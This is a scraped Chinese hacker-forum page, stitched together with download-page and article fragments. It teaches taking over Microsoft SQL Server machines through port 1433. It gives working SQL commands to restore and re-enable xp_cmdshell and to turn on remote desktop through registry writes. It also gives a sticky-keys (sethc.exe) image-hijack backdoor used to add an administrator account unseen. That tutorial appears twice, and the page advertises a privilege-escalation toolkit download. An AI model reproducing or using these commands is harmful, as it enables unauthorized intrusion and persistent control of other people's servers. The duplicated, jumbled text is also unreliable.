1433扫描+爆破+提权服务器提权压缩包密码是多少

1433访问提权 错误修复方法总结【红客吧】_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0成为超级会员,使用一键签到本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:111,793贴子:
1433访问提权 错误修复方法总结收藏
1433访问提权错误修复:1.修复错误:Error Message:未能找到存储过程 'master..xp_cmdshell'。修复方法:xp_cmdshell新的恢复办法 第一步先删除:drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 服务器: 消息 3701,级别 11,状态 5,行 1第二步恢复:dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 直接恢复,不管sp_addextendedproc是不是存在 修复工具:mssql查询分析器操作2.修复“拒绝访问”错误:修复方法:Net1Dir net.exe /s /p修复工具:SQLtools3.修复错误:Error Message:SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。修复方法:;EXEC sp_configure 'show advanced options', 1 -- ;RECONFIGURE WITH OVERRIDE -- ;EXEC sp_configure 'xp_cmdshell', 1 -- ;RECONFIGURE WITH OVERRIDE -- ;EXEC sp_configure&&& 'show advanced options', 0 -- 修复工具:mssql查询分析器操作4.修复错误Error Message:无法装载 DLL xpweb70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。修复方法:SQLtools工具--文件管理--C盘--寻找数据库路径--复制(c:\Program Files\Microsoft SQL Server\MSSQL\Binn\)xplog70.dl路径SQLtools工具--SQL命令--执行如下:第一步.exec sp_dropextendedproc 'xp_cmdshell'第二步dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll");EXEC sp_configure&&& 'show advanced options', 0 -- 修复工具:SQLtools5.修复错误Error Message:无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)。修复方法:第一步exec sp_dropextendedproc 'xp_cmdshell'第二步dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll");EXEC sp_configure&&& 'show advanced options', 0 -- 修复工具:SQLtools6.修复错误:出现3389无法连接的情况:1.没有开启33892.终端端口被改变88883.内网修复方法:开3389:Cmd 命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f修复工具:SQLtoolsSql命令查看3389端口exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'修复工具:SQLtools开3389exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--&&关3389:exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;&&修复工具:mssql查询分析器操作
不懂…顶个先
此贴可收藏,可加精.
点击率却很少…
呵呵,因为这里的很多人不知道这个是用来做什么的.
登录百度帐号1433提权工具包.zip_威盘下载
文件名称: 1433提权工具包.zip
文件大小: 4.05 MB
下载统计: 3014
今天下载: 1
相关网站: 未设置
文件校验: 4EE9BDA999FE4B270EEDF6
安全扫描: 未扫描
正在获取下载地址...
o 关于文件解压缩等常用工具,请往
o 您可以复制本页地址(http://www.vdisk.cn/down/index/)给朋友分享.
o 此文件是用户自行上传管理的,与威盘网无关.如果对文件有异议,欢迎对其.
o 如果您对该用户上传的文件感兴趣,可以
o 本页采用缓存技术,最后更新时间: 10:29:55
o 推荐:& &sponsored links
1433弱口令映像劫持后门快速提权法
提权条件:1.服务器开启了终端端口(终端端口未必是3389,可以自行查询)2.服务器的粘滞键功能无损,只要可以正常弹出即可3.服务器未禁止注册表编辑(即写入功能)罗嗦一句:1433提权没有一种方法是万能,有时要多种方法结合,管理员的安全意识都在提高,现在没有几年前那么单纯的cmdshll就能提起来的了开始sqltools登录目标服务器:运行工具的dos命令,发现Error Message:xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)在以前的授渔课程中说过这是cmd.exe的权限被限制了也提供了绕过的方法,在此不再赘述,请看以前的教程下面收集下服务器的相关资料和信息,以备提权使用sql命令查询服务器的版本等相关信息:EXEC xp_msver由于组件xplog70.dll被删除了,无法显示,下面再看下终端信息sql命令读取服务器终端端口:exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'终端端口为3389,连接测试终端端口,并测试shift粘滞键功能连接正常,粘滞键测试正常弹出,再去收集下其他信息&c盘下有sql的安装目录,这个可是好东西,以前授渔也讲过请自行查阅下面这里是这课的核心重点了,请十二万分关注先发布三条命令1.sql命令查询注册表粘滞键是否被劫持exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',&'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'好了,我们替换后查询一下看看是否正确写入注册表了查询结果显示正常写入,下面就连接终端,五次shift,弹出可爱的任务管理器了,尊敬的管理员还在上面呢,他还不知道我们在悄悄的潜入进来了,太好玩了.&看下张图,点文件--新建任务,我们新建个explorer的任务&当程序运好后我们就看到了一个临时的桌面系统了,打开计算管理工具,什么?不会开?那位同学,你可要补习下电脑系统知识先了,我的电脑上右键,弹出菜单点管理啊这时我们找到计算机管理工具里的本地用户和组,打开用户的选项,添加新账号和密码吧.&这里你也可以找到cmd命令去建立用户,当然,这时cmd的权限是被禁用的,还要改权限,比较麻烦,你也可以找其他目录下cmd.exe,有些权限设置得不好的,就可以执行了,这里我们就用计算机管理来创建用户,就当是吃快餐面,方便嘛.跑题了跑题了******接下来干吗?当然要把新建的账号添加到管理组了,用脚趾头想的人都知道*^_^*一切KO了,不对应该是OK了,那么就终端登录吧,看看成果,嘿嘿,还不错的一台服务器.&
打开&开始&&&运行&,在&运行&一栏中输入&Rundll32 netplwiz.dll,UsersRunDll&命令打开用户帐户窗口(注意区分大小写)
这篇文章主要介绍了C++映像劫持后门,实例分析了C++映像劫持后门的原理与相关实现技巧,有助于进一步了解后门的原理,需要的朋友可以参考下本文实例讲述了C++映像劫持后门的方法.分享给大家供大家参考.具体如下: // freeheart.cpp : Defines the entry point for the console application. //学 ...
首先: 1.服务器开启了终端端口(终端端口未必是3389,可以自行查询) 2.服务器的粘滞键功能无损,只要可以正常弹出即可 3.服务器未禁止注册表编辑(即写入功能) sql命令读取服务器终端端口: exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Te ...
一. 奇怪的中毒现象在办公室的一台电脑上折腾半个小时后,电脑部的工程师只觉得眼皮不停狂跳,因为从刚开始接手这个任务开始,他就一直在做无用功:他随身带的U盘里引以为豪的众多维护工具包在这台机器上全军覆没,无论他直接在U盘上运行还是随便复制到哪个目录里,系统都是报告&找不到文件&或者直接没有运行起来的反应,他第一次感受到了恐惧,文件分明就好好 ...
转自 海蓝(yxyhack)的博客([url]http://blog.csdn.net/yxyhack/archive//1794724.aspx[/url]) 原文如下: 一. 诡异的中毒现象 在成品检验科文员办公室的一台电脑上折腾半个小时后,计算机维护部门的技术员只觉得眼皮不停狂跳,因为从刚开始接手这个任务开始,他就一直在做无用功:他 ...
请记录好Debugger指向的程序位置,也不要试图再执行那些安全工具,首先应该尝试删除受影响的 IFEO项,然后刷新注册表看看数据是否马上恢复了,如果马上恢复,则说明后台里有程序正在实时判断和写入IFEO,这时候必须拿出 Sysinternals出品的注册表监控工具Regmon或类似工具,设置Filter为你正在尝试删除的安全工具的IFEO项,很快就能发现具 ...提权条件:1.服务器开启了终端端口(终端端口未必是3389,可以自行查询)2.服务器的粘滞键功能无损,只要可以正常弹出即可3.服务器未禁止注册表编辑(即写入功能)罗嗦一句:1433提权没有一种方法是万能,有时要多种方法结合,管理员的安全意识都在提高,现在没有几年前那么单纯的cmdshll就能提起来的了开始sqltools登录目标服务器:运行工具的dos命令,发现Error Message:xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)在以前的授渔课程中说过这是cmd.exe的权限被限制了也提供了绕过的方法,在此不再赘述,请看以前的教程下面收集下服务器的相关资料和信息,以备提权使用sql命令查询服务器的版本等相关信息:EXEC xp_msver由于组件xplog70.dll被删除了,无法显示,下面再看下终端信息sql命令读取服务器终端端口:exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'终端端口为3389,连接测试终端端口,并测试shift粘滞键功能连接正常,粘滞键测试正常弹出,再去收集下其他信息&c盘下有sql的安装目录,这个可是好东西,以前授渔也讲过请自行查阅下面这里是这课的核心重点了,请十二万分关注先发布三条命令1.sql命令查询注册表粘滞键是否被劫持exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',&'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'好了,我们替换后查询一下看看是否正确写入注册表了查询结果显示正常写入,下面就连接终端,五次shift,弹出可爱的任务管理器了,尊敬的管理员还在上面呢,他还不知道我们在悄悄的潜入进来了,太好玩了.&看下张图,点文件--新建任务,我们新建个explorer的任务&当程序运好后我们就看到了一个临时的桌面系统了,打开计算管理工具,什么?不会开?那位同学,你可要补习下电脑系统知识先了,我的电脑上右键,弹出菜单点管理啊这时我们找到计算机管理工具里的本地用户和组,打开用户的选项,添加新账号和密码吧.&这里你也可以找到cmd命令去建立用户,当然,这时cmd的权限是被禁用的,还要改权限,比较麻烦,你也可以找其他目录下cmd.exe,有些权限设置得不好的,就可以执行了,这里我们就用计算机管理来创建用户,就当是吃快餐面,方便嘛.跑题了跑题了******接下来干吗?当然要把新建的账号添加到管理组了,用脚趾头想的人都知道*^_^*一切KO了,不对应该是OK了,那么就终端登录吧,看看成果,嘿嘿,还不错的一台服务器.&
打开&开始&&&运行&,在&运行&一栏中输入&Rundll32 netplwiz.dll,UsersRunDll&命令打开用户帐户窗口(注意区分大小写)
阅读(...) 评论()

我要回帖

更多关于 查看压缩文件 的文章

 

随机推荐